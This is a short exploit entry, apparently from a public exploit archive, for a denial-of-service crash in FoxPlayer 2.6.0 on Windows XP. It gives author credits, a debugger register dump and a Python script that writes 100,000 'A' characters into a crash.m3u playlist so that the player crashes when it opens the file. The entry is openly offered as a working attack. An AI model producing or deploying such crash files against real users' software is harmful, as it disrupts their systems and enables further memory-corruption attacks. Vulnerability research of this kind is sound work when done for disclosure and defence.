# ######################################## # Exploit Title : FoxPlayer 2.6.0 Denial of Service # Software link : http://www.foxmediatools.com/products/foxplayer.html # Version : 2.6.0 # Tested on : Windows XP SP3 English # Date : 2/07/2011 # Author : X-h4ck # Website : http://www.pirate.al , # PirateAL Crew @2011 # Email : mem001@live.com # Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta # # ++++++++++++++++++++++++++++++++++++++++ # EAX 00000001 # ECX 80604824 # EDX F98D29A0 # EBX 009E3F24 # ESP 00D7FF24 # EBP 00D7FF58 # ESI 00D7FF80 # EDI 00150178 # EIP 7C90E440 ntdll.KiUserCallbackDispatcher # C 0 ES 0023 32bit 0(FFFFFFFF) # P 1 CS 001B 32bit 0(FFFFFFFF) # A 0 SS 0023 32bit 0(FFFFFFFF) # Z 1 DS 0023 32bit 0(FFFFFFFF) # S 0 FS 003B 32bit 7FFDC000(FFF) # T 0 GS 0000 NULL # D 0 # O 0 LastErr ERROR_SUCCESS (00000000) # EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE) # ST0 empty -4.0939429568750045000e-304 # ST1 empty 4.3561165078637922000e+184 # ST2 empty 4.1992150799306400000e-314 # ST3 empty -4.1012839767180717000e-304 # ST4 empty 3.8485487393211591000e+032 # ST5 empty -4.1034116763009024000e-304 # ST6 empty 1.1842037541513188000e-103 # ST7 empty 1.2519775166695107000e-312 # 3 2 1 0 E S P U O Z D I # FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) # FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 # ++++++++++++++++++++++++++++++++++++++++ #!/usr/bin/python try: junk = "\x41" * 100000 f = open("crash.m3u",'w') f.write(junk) f.close() print "File created succesfuly\n" except: print "ERROR!\n"
Jul 3, 2011